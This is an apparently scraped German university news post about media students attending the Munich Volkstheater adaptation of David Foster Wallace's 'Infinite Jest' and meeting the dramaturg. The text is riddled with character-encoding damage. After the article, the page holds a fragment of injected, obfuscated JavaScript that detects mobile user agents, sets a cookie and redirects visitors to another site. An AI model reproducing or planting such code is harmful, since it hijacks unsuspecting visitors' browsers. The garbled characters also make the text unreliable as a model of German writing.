KulturjournalistInnen haben ai??zUnendlichen SpaAYai???

MHMK-Studierende besuchen MA?nchner Volkstheater und treffen Dramaturgin Katja Friedrich

Dramaturgin Katja Friedrich mit MHMK-Studierenden

(MA?nchen) David Foster Wallaces Roman ai??zUnendlicher SpaAYai??? ist eigentlich eine beiAYende Satire auf den Kultur- und Medienbetrieb. Doch genau da ist das vielgepriesene Werk jetzt angekommen: Das MA?nchner Volkstheater hat das 1.500-seitige Opus Magnum jetzt dramatisiert und auf die BA?hne gebracht. MHMK-Studierende des Fachs Kulturjournalismus haben sich vor Ort selbst von der kA?nstlerischen QualitAi??t dieser Bearbeitung A?berzeugt und dabei auch persAi??nlich mit der Dramaturgin Katja Friedrich gesprochen, die fA?r die BA?hnenfassung mitverantwortlich zeichnete.

ai??zUnsere Textfassung wurde am Ende 50 Seiten langai???, erzAi??hlte Friedrich beim entspannten kulturjournalistischen Plausch im ans Volkstheater angrenzenden ai??zVolksgartenai???. Bei einer RomanlAi??nge von knapp 1.500 Seiten bedeutete das zwangslAi??ufig herbe ai??zStricheai???, wie TextkA?rzungen im Theaterjargon heiAYen. AuAYerdem sei Romansprache keine BA?hnensprache, und gerade die auAYerordentliche Sprachkunst des Romanciers Foster Wallace sperre sich einer einfachen Adaption ins BA?hnendeutsch, fA?hrte Friedrich weiter aus. Die grAi??AYte Schwierigkeit bei der Dramatisierung sei aber der Umstand gewesen, dass schon der Roman ai??zkeine kohAi??rente Geschichteai??? erzAi??hle. Herausgekommen ist ein TheaterstA?ck, das sich schon beinahe wagemutig in ein klassisches 3-aktiges Korsett zwAi??ngte und das beim MA?nchner Publikum geteilte Reaktionen hervorgerufen hat. Im GesprAi??ch mit der Dramaturgin erfuhren die MHMK-Studierenden, die von ihrem Dozenten Prof. Dr. Hektor HaarkAi??tter begleitet worden sind, auch einiges A?ber BA?hnenarbeit und Probenalltag, die TAi??tigkeit einer Dramaturgin am Theater und die hAi??ufig ausufernden Arbeitszeiten in Kreativberufen. -)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Facebook Like

Comments are closed.